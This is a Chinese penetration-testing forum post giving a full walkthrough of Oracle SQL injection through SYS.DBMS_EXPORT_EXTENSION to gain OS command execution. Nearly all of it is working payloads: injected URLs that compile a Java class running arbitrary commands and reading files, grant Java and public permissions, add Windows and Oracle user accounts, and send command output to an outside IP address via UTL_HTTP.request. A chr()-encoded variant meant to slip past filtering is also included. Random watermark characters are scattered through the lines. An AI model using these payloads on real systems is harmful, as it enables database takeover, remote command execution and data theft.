找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2242|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 : `7 h) x6 d: v9 }* ~2 D6 j# c

8 b: {. s: L- U6 U) a) H8 ?  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
7 V$ N7 e- x& G5 \5 `4 E# F的形式即可。(用" 'a'|| "是为了让语句返回true值)
# B$ D) v8 U. ?( b0 s语句有点长,可能要用post提交。 % t1 D( _' N. o: r- V
以下是各个步骤:
$ D# p3 Y7 O5 K% u! }1.创建包 0 {9 b9 T( w& E4 u, d, Y+ Z5 Q
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:# v+ Z7 ^* S9 u  v
/xxx.jsp?id=1 and '1'<>'a'||(
4 h6 N1 R% J' @) S& H2 L' Rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& @- w8 E4 ?( S- Q
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader() g$ Z! b2 r" x, u) Q
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}, @( ~1 e9 N( Q- c" z9 x, H3 H
}'''';END;'';END;--','SYS',0,'1',0) from dual
* L  D4 N$ h' H! o# G' r4 C)
2 |5 V1 H% _/ ~$ ?6 t------------------------
  I9 t1 V! C* ^% a; d如果url有长度限制,可以把readFile()函数块去掉,即: - X. l1 j2 ~4 o; ?- H$ y( S  y7 P
/xxx.jsp?id=1 and '1'<>'a'||( ; }  T7 G, y& `. y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 a" c- D) d; T2 X3 @. o1 w+ Tcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(! ~/ r* d$ j0 X* F! F6 _
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}" d6 g, a; f6 `# N  {' l# n- q
}'''';END;'';END;--','SYS',0,'1',0) from dual
& Y6 S  T6 p% Q5 v)
: R( d& X+ \! w# F: }同时把后面步骤 提到的 对readFile()的处理语句去掉。 6 Q5 W6 P. w) v7 L+ l6 A! S! u
------------------------------ 2 U' g! A  u0 ]: t& a  v
2.赋Java权限 : H0 j4 K" s9 K  u3 E! m* s# |
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; [7 ]8 n" T; s0 @) V3 N6 H
3.创建函数 ; C" T* B% X8 b# C( W% `2 Q! `0 i, _  m& @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 w' d2 E/ y, t. k  y" rcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual/ L! o0 {9 n( w: y3 p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# E& _  S" G" h9 {1 m: `/ h+ Bcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual8 [5 v1 {5 }  w0 S3 N3 y
4.赋public执行函数的权限 4 g3 @! Z+ M0 I" ]+ B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual0 R- ~& O. M* W6 Y5 m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual- Q. f3 w' w: {) _6 J; N2 w( t% U
5.测试上面的几步是否成功
, M; ]' o. u# R' M8 G/ rand '1'<>'11'||( ' W$ D. y8 h% r; S( z, _3 p
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
  _/ j, c& J. G9 q: `1 E/ {) / k* [6 @. ?; f0 z4 ]' B! w
and '1'<>(
! s; W; Q8 }5 c( ?. uselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
- s$ ]* d8 E, s  D; N( U& Q) 4 e" P5 `# t9 t, y$ I, V
6.执行命令:
7 g2 R6 D6 s8 W% ?3 ^% T' _/xxx.jsp?id=1 and '1'<>( 7 y; E- F: @& W% _6 G" |7 K" R
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 0 }* W1 @/ p6 S/ j+ [& m7 V; ~
3 x- L1 T  i, u2 c( r
)
! M' h+ V# k3 m: b/xxx.jsp?id=1 and '1'<>( " N! t3 r: |2 M- {  ^( F. ^
select  sys.LinxReadFile('c:/boot.ini') from dual
! ^+ c: Y' J# q1 _
8 n+ Z% l1 Q; o; I)+ i. `5 y# Q( B  I" K2 c" L" B/ ~
  
1 W4 ]- A, D/ \/ I8 e注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 / N4 B( ~  ~" O/ h  M2 j% K) p
如果要查看运行结果可以用 union :
+ K( ]$ w. ~9 N+ @5 o3 [/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual( p+ W& g* _; _3 d9 S& l; o
或者UTL_HTTP.request(: 2 Z2 l) \! g# [. x( j, Q
/xxx.jsp?id=1 and '1'<>(
6 o0 w; S9 H$ O) B5 x- ySELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
& j$ g5 B( {: W) 7 ~/ L# H! v5 `- ^( C9 e
/xxx.jsp?id=1 and '1'<>(
& i+ e% Q# [- ^6 J" R0 w, CSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
6 v! }, ^- l/ h  l- a)
) I$ E& u0 {2 m: S4 H注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
5 V1 Y% D& I; p- E. _8 P-------------------- " B2 z8 j" f( D+ q/ y+ h$ p# d
6.内部变化 8 E* F+ O5 B, C/ U/ s# X
通过以下命令可以查看all_objects表达改变:
$ \" f, {- C1 J# V" J3 \7 P! Xselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
. d' j) b3 j! m7.删除我们创建的函数 9 z. o1 R& w) s4 c7 T7 q& F
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 ~: Y5 U2 J5 O& r3 S) |drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
- `' m' z0 N  A1 K3 y====================================================
( M) H+ r! c" Z2 D全文结束。谨以此文赠与我的朋友。 3 `) ?- n4 l# t
linx 3 S2 z) x' ]$ ~  U3 \- }, v
124829445 4 {! }  _7 C+ b4 Y) U+ i
2008.1.12
0 X' N; ?+ w3 _) ~. a. ^linyujian@bjfu.edu.cn , ]$ n0 o# p- G0 J6 o; u  m9 ]8 w
====================================================================== 2 }& Q: i- E1 n
测试漏洞的另一方法: 8 l: B$ [4 @1 x2 j8 p/ R6 o
创建oracle帐号: 8 Z. J* L' }8 A4 h" z, R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 t1 \2 ^9 L2 h/ O  D0 p% `
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual2 M- P8 n6 B( w  d9 m
即:
( [* _! v1 e  F1 K& Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
6 V0 n  I9 Y' q- n) q2 schr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual # b+ P2 J, i, p& [
确定漏洞存在: - D+ T" t; x) {8 P5 z$ n
1<>( - B! N  x0 @7 r8 ?, {  O2 U5 s5 e
select user_id from all_users where username='LINXSQL'
0 Y7 n9 B& `5 P( X1 r) ' y1 P$ W( i: n, S
给linxsql连接权限: ' u# H+ |9 `: `
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 J/ O' S% d, L% _
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
2 m6 `1 A" e; V$ y删除帐号: " _) D7 Y1 ?7 Q) s) y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ i7 e% e: i% w$ Mdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 4 \; ~- c% v1 q- L5 _
====================== , v6 W+ V2 u; B! E
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
, K+ F" i) t$ z4 R  @" S1 J1.jsp?id=1 and '1'<>(
' \0 N  ~0 h# T6 T! o0 z3 R: T3 Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 m! P0 u: k3 ~5 w- B
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual7 C. l2 o" {3 D0 U" Y; r5 ^
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
& K7 ]  p9 }5 r; P ); ~3 I8 G; m5 E& x. W  @% @; b

1 q) g, L/ V, ?3 z' S# t( v& w6 G5 I1 Z+ z
) e& P9 m& U. Y7 w
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表